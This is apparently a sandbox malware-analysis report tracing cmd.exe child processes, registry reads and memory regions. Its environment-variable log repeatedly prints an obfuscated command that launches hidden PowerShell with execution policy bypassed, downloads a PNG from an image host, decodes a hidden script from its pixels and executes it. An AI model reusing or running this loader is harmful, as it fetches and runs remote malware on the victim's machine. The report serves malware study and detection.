Get Environment String name = +,\, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = ]#, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140;(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = _`@#, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = [_, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = $_'}, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = \[,#, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = ,`, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 2
Fn
Process #8: cmd.exe
60 0
»
Information Value
ID #8
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /c ^ft^Y^p^e | ^f^iN^d^S^t^r ^c^m
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:01:44, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
»
Information Value
PID 0xb24
Parent PID 0xb04 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B28
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00046fff Pagefile Backed Memory r True False False -
private_0x0000000000050000 0x00050000 0x0014ffff Private Memory rw True False False -
pagefile_0x0000000000150000 0x00150000 0x00153fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory r True False False -
locale.nls 0x00170000 0x001d6fff Memory Mapped File r False False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory rw True False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory rw True False False -
private_0x0000000000200000 0x00200000 0x002fffff Private Memory rw True False False -
private_0x0000000000300000 0x00300000 0x003fffff Private Memory rw True False False -
pagefile_0x0000000000400000 0x00400000 0x00587fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000590000 0x00590000 0x00710fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000720000 0x00720000 0x01b1ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001b20000 0x01b20000 0x01e62fff Pagefile Backed Memory r True False False -
private_0x0000000001e70000 0x01e70000 0x01e70fff Private Memory rw True False False -
private_0x0000000001e80000 0x01e80000 0x01f7ffff Private Memory rw True False False -
sortdefault.nls 0x01f80000 0x0224efff Memory Mapped File r False False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (9)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 4
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0xb2c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Windows\system32\findstr.exe os_pid = 0xb34, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:15 (UTC) True 1
Fn
Get Time type = Ticks, time = 140603 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 4
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 2
Fn
Process #9: cmd.exe
300 0
»
Information Value
ID #9
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /S /D /c" ftYpe "
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:01:44, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
»
Information Value
PID 0xb2c
Parent PID 0xb24 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B30
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory r True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File r False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory rw True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory rw True False False -
private_0x00000000001b0000 0x001b0000 0x002affff Private Memory rw True False False -
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory rw True False False -
private_0x0000000000470000 0x00470000 0x0056ffff Private Memory rw True False False -
private_0x0000000000610000 0x00610000 0x0061ffff Private Memory rw True False False -
pagefile_0x0000000000620000 0x00620000 0x007a7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007b0000 0x007b0000 0x00930fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000940000 0x00940000 0x01d3ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001d40000 0x01d40000 0x02082fff Pagefile Backed Memory r True False False -
private_0x0000000002090000 0x02090000 0x0218ffff Private Memory rw True False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
advapi32.dll 0x7feff0e0000 0x7feff1bafff Memory Mapped File rwx False False False -
sechost.dll 0x7feff1c0000 0x7feff1defff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7feffc50000 0x7feffd7cfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffddfff Private Memory rw True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdefff Private Memory rw True False False -
Host Behavior
File (7)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Registry (269)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\*\Shell\Open\Command - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
